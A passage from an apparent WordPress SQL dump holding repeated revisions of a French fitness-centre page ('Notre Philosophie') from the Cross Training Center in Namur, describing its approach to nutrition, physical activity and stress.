'open', '', '5-revision-v1', '', '', '2013-06-16 10:26:16', '2013-06-16 10:26:16', '', 5, 'http://www.crosstrainingcenter.be/?p=77', 0, 'revision', '', 0),
(79, 1, '2013-06-16 12:22:37', '2013-06-16 12:22:37', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-52 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n[widgets_on_pages id=\"objectif\"]\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:22:37', '2013-06-16 12:22:37', '', 5, 'http://www.crosstrainingcenter.be/?p=79', 0, 'revision', '', 0),
(80, 1, '2013-06-16 12:48:30', '2013-06-16 12:48:30', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n[widgets_on_pages id=\"objectif\"]\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:48:30', '2013-06-16 12:48:30', '', 5, 'http://www.crosstrainingcenter.be/?p=80', 0, 'revision', '', 0),
(81, 1, '2013-06-16 12:49:14', '2013-06-16 12:49:14', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:49:14', '2013-06-16 12:49:14', '', 5, 'http://www.crosstrainingcenter.be/?p=81', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(82, 1, '2013-06-16 12:50:14', '2013-06-16 12:50:14', '<h2>Titre de blabla</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:50:14', '2013-06-16 12:50:14', '', 5, 'http://www.crosstrainingcenter.be/?p=82', 0, 'revision', '', 0),
(83, 1, '2013-06-16 12:52:57', '2013-06-16 12:52:57', '<h2>Titre de blabla</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:52:57', '2013-06-16 12:52:57', '', 5, 'http://www.crosstrainingcenter.be/?p=83', 0, 'revision', '', 0),
(84, 1, '2013-06-16 12:56:03', '2013-06-16 12:56:03', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:56:03', '2013-06-16 12:56:03', '', 5, 'http://www.crosstrainingcenter.be/?p=84', 0, 'revision', '', 0),
(85, 1, '2013-06-16 12:57:28', '2013-06-16 12:57:28', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:28', '2013-06-16 12:57:28', '', 5, 'http://www.crosstrainingcenter.be/?p=85', 0, 'revision', '', 0),
(86, 1, '2013-06-16 12:57:39', '2013-06-16 12:57:39', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:39', '2013-06-16 12:57:39', '', 5, 'http://www.crosstrainingcenter.be/?p=86', 0, 'revision', '', 0),
(88, 1, '2013-06-16 12:58:10', '2013-06-16 12:58:10', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:10', '2013-06-16 12:58:10', '', 5, 'http://www.crosstrainingcenter.be/?p=88', 0, 'revision', '', 0),
(87, 1, '2013-06-16 12:57:53', '2013-06-16 12:57:53', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:53', '2013-06-16 12:57:53', '', 5, 'http://www.crosstrainingcenter.be/?p=87', 0, 'revision', '', 0),
(89, 1, '2013-06-16 12:58:23', '2013-06-16 12:58:23', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:23', '2013-06-16 12:58:23', '', 5, 'http://www.crosstrainingcenter.be/?p=89', 0, 'revision', '', 0),
(102, 1, '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 'pico1', '', 'inherit', 'open', 'open', '', 'pico1', '', '', '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png', 0, 'attachment', 'image/png', 0),
(91, 1, '2013-06-16 12:58:34', '2013-06-16 12:58:34', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:34', '2013-06-16 12:58:34', '', 5, 'http://www.crosstrainingcenter.be/?p=91', 0, 'revision', '', 0),
(291, 1, '2013-07-04 18:52:09', '2013-07-04 18:52:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, 